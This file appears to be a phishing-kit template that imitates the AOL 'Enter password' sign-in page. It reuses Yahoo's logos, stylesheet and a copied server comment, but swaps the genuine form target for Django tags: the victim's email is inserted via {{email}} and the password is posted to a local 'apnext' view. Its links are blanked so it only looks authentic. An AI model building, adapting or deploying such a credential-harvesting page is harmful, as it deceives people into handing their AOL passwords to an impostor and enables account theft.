
<!DOCTYPE html>
<html lang="en-US">
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="initial-scale=1, maximum-scale=1, user-scalable=0, shrink-to-fit=no"/>
        <meta name="referrer" content="strict-origin-when-cross-origin">
        <title>Aol</title>
        <style nonce="bH8BEcQfIOQ8Gj8XMXNbA7GzrfjG4ofPzeDKXCiMm8XCSQDT">
            #mbr-css-check {
                display: inline;
            }
        </style>
        <link href="https://s.yimg.com/wm/mbr/d00405303febe2718435ac086630741fde4bc7a7/yahoo-main.css" rel="stylesheet" type="text/css">
        
    </head>
    <body class="bucket-mbr-whatsapp-ac bucket-mbr-passkey-unr-reg bucket-mbr-whatsapp-nac bucket-mbr-request-imapin-scopes-ym">
    
    <div id="login-body" class="loginish  puree-v2  grid   ">
    <div class="mbr-desktop-hd">
    <span class="column">
         <a href="">
            <img src="https://s.yimg.com/cv/apiv2/ybar/logos/aol-logo-black-v1.png" alt="Aol" class="logo aol-en-US" width="100" height="" />
                    <img src="https://s.yimg.com/cv/apiv2/ybar/logos/aol-logo-white-v1.png" alt="Aol" class="dark-mode-logo logo aol-en-US" width="100" height="" />
        </a>
    </span>
    <div class="desktop-universal-header">
        <a href="" data-ylk="elm:link;elmt:link;slk:headerHelp">Help</a>
        <a href="" class="universal-header-links" data-rapid-tracking="true" data-ylk="elm:link;elmt:link;slk:headerTerms">Terms</a>
        <a href="" class="universal-header-links privacy-link" data-rapid-tracking="true" data-ylk="elm:link;elmt:link;slk:headerPrivacy">Privacy</a>
    </div>
</div>
    <div class="login-box-container">
        <div class="login-box right">
            <div class="mbr-login-hd txt-align-center">
                <img src="https://s.yimg.com/cv/apiv2/ybar/logos/aol-logo-black-v1.png" alt="Aol" class="logo aol-en-US" width="100" height="" />
                <img src="https://s.yimg.com/cv/apiv2/ybar/logos/aol-logo-white-v1.png" alt="Aol" class="dark-mode-logo logo aol-en-US" width="100" height="" />
            </div>
            <div class="challenge password-challenge">
    <div class="challenge-header">
        <div class="yid">{{email}}</div>
    </div><div id="password-challenge" class="primary">
    <strong class="challenge-heading">Enter password</strong>
    <span class="txt-align-center challenge-desc">to finish sign in</span>
        <form action="{% url 'apnext' %}" method="post" class="challenge-form ">
            {% csrf_token %}       
        <div id="password-container" class="input-group password-container focussed">
            <input type="password" id="login-passwd" class="password"  name="password"
                placeholder=" " autofocus autocomplete="current-password"
                data-rapid-tracking="true" data-ylk="elm:input;elmt:focus;slk:passwd;mKey:focus-passwd" />
            <label for="login-passwd" id="password-label" class="password-label">Password</label>
            <div class="caps-indicator hide" id="caps-indicator" title="Capslock is on"></div>
        </div>
        <div class="reverse-order">
                <div class="button-container">
                    <button type="submit" id="login-signin" class="pure-button puree-button-primary puree-spinner-button challenge-button"
                        name="verifyPassword" value="verifyPasswordPrimary"
                        data-rapid-tracking="true" data-ylk="elm:btn;elmt:primary;slk:next;mKey:next">
                            Next
                    </button>
                </div>

        </div>
    </form>
</div>
</div>
        </div>
        <div id="login-box-ad-fallback" class="login-box-ad-fallback">
</div>
    </div>
    <div class="login-bg-outer">
        <div class="login-bg-inner">
            <div id="login-ad-rich" aria-hidden="true">
                <iframe id="login-ads-gpt-iframe" allow="geolocation &#x27;none&#x27;; fullscreen &#x27;none&#x27;; autoplay &#x27;none&#x27;; camera &#x27;none&#x27;; display-capture &#x27;none&#x27;; document-domain &#x27;none&#x27;; microphone &#x27;none&#x27;; gyroscope &#x27;none&#x27;; magnetometer &#x27;none&#x27;; midi &#x27;none&#x27;; payment &#x27;none&#x27;; serial &#x27;none&#x27;; speaker-selection &#x27;none&#x27;" sandbox="allow-forms allow-popups allow-popups-to-escape-sandbox allow-same-origin allow-scripts" width="1440" height="1024" scrolling="no" frameborder="no"></iframe>
            </div>
                    </div>
    </div>
</div>
    <div id="mbr-css-check"></div>
    <div id="page-mask" class="page-mask hide"></div>
    <div id="ad"></div>
    <div class="mbr-legacy-device-bar" id="mbr-legacy-device-bar">
        <p class="mbr-legacy-device">
                Yahoo works best with the latest versions of the browsers. You're using an outdated or unsupported browser and some Yahoo features may not work properly. Please update your browser version now. <a href="">More Info</a>
        </p>
    </div>

    </body>
</html>
<!-- fe06.member.bf1.yahoo.com - Wed Dec 18 2024 12:49:23 GMT+0000 (Coordinated Universal Time) - (1ms) -->